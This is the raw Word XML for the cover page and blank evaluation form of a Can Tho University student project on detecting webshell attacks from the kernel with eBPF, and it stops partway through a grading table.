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bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.z2riruybj63i" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>đại học cần thơ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>trường công nghệ thông tin và truyền thông</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Khoa mạng máy tính và truyền thông</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.wyi9eb6ywdrp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2063750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>403225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1692910" cy="1692910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="image1.png" descr="Logo chính thức trường Đại học Cần Thơ"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="image1.png" descr="Logo chính thức trường Đại học Cần Thơ"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="2943225" y="1543050"/>
                      <a:ext cx="1692910" cy="1692910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.hlcqzyj8esot" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>niên luận cơ sở an toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>chủ đề: xây dựng hệ thống giám sát và phát hiện hành vi tấn công webshell từ kernel bằng công cụ EbPf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId5" w:type="first"/>
          <w:footerReference r:id="rId7" w:type="first"/>
          <w:footerReference r:id="rId6" w:type="default"/>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417"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start="1"/>
          <w:cols w:space="720" w:num="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1724025" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="952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1724025" cy="1057275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:w="4313" w:space="425"/>
            <w:col w:w="4313"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>NGÔ VĂN TIẾN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>MSSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: B2304087</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Lớp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: DI23D2A1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ngành</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: An toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Khóa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: K49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Giáo viên hướng dẫn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Giảng viên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: TS. Hà Duy An</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:w="4313" w:space="425"/>
            <w:col w:w="4313"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:w="4313" w:space="425"/>
            <w:col w:w="4313"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:space="720" w:num="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>học kỳ 3, năm học 2025-2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ĐÁNH GIÁ KẾT QUẢ THỰC HIỆN NIÊN LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(Học kỳ : 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, Năm 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="26"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tên đề tài</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>...................................................................................................................</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>............................................................................................................................................</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các giáo viên hướng dẫn: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4368"/>
        <w:gridCol w:w="2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747" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4368" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>HỌ VÀ TÊN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>MSCB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7" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4368" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các SInh viên thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="17"/>
        <w:tblW w:w="92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3124"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1847"/>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539" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3157" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>HỌ VÀ TÊN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>MSCB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>THƯỞNG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 1,0 điểm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>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 w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3157" w:type="dxa"/>
          </w:tcPr>
          <w:p>
